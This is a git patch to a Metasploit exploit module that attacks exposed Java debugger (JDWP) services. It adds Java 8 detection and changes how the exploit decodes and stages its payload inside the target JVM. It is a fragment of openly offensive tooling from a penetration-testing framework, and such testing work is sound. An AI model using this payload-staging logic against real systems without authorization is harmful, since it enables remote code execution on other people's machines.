From 73536f2ac0112ec49bdcd54e1df87450e0adb3e5 Mon Sep 17 00:00:00 2001 From: Julian Vilas Date: Sat, 7 Jun 2014 22:43:14 +0200 Subject: [PATCH] Add support Java 8 --- .../exploits/multi/misc/java_jdwp_debugger.rb | 20 ++++++++++++++++--- 1 file changed, 17 insertions(+), 3 deletions(-) diff --git a/modules/exploits/multi/misc/java_jdwp_debugger.rb b/modules/exploits/multi/misc/java_jdwp_debugger.rb index 73e838bfc0..85717b6a6c 100644 --- a/modules/exploits/multi/misc/java_jdwp_debugger.rb +++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb @@ -318,6 +318,10 @@ class Metasploit3 < Msf::Exploit::Remote "#{@vars["vm_name"]} - #{@vars["vm_version"]}" end + def is_java_eight + version.downcase =~ /1[.]8[.]/ + end + # Returns reference types for all classes currently loaded by the target VM def get_all_classes return unless @classes.empty? @@ -624,8 +628,13 @@ class Metasploit3 < Msf::Exploit::Remote # Stores the payload on a new string created in target VM def upload_payload(thread_id, pl_exe) size = @vars["objectid_size"] - runtime_class , runtime_meth = get_class_and_method("Lsun/misc/BASE64Decoder;", "") - buf = create_instance(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"]) + if is_java_eight + runtime_class , runtime_meth = get_class_and_method("Ljava/util/Base64;", "getDecoder") + buf = invoke_static(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"]) + else + runtime_class , runtime_meth = get_class_and_method("Lsun/misc/BASE64Decoder;", "") + buf = create_instance(runtime_class["reftype_id"], thread_id, runtime_meth["method_id"]) + end unless buf[0] == [TAG_OBJECT].pack('C') fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected Object") end @@ -644,7 +653,12 @@ class Metasploit3 < Msf::Exploit::Remote data = [TAG_OBJECT].pack('C') data << format(size, cmd_obj_id) data_array = [data] - runtime_class , runtime_meth = get_class_and_method("Lsun/misc/CharacterDecoder;", "decodeBuffer", "(Ljava/lang/String;)[B") + + if is_java_eight + runtime_class , runtime_meth = get_class_and_method("Ljava/util/Base64$Decoder;", "decode", "(Ljava/lang/String;)[B") + else + runtime_class , runtime_meth = get_class_and_method("Lsun/misc/CharacterDecoder;", "decodeBuffer", "(Ljava/lang/String;)[B") + end buf = invoke(decoder, thread_id, runtime_class["reftype_id"], runtime_meth["method_id"], data_array) unless buf[0] == [TAG_ARRAY].pack('C') fail_with(Failure::UnexpectedReply, "Unexpected returned type: expected ByteArray")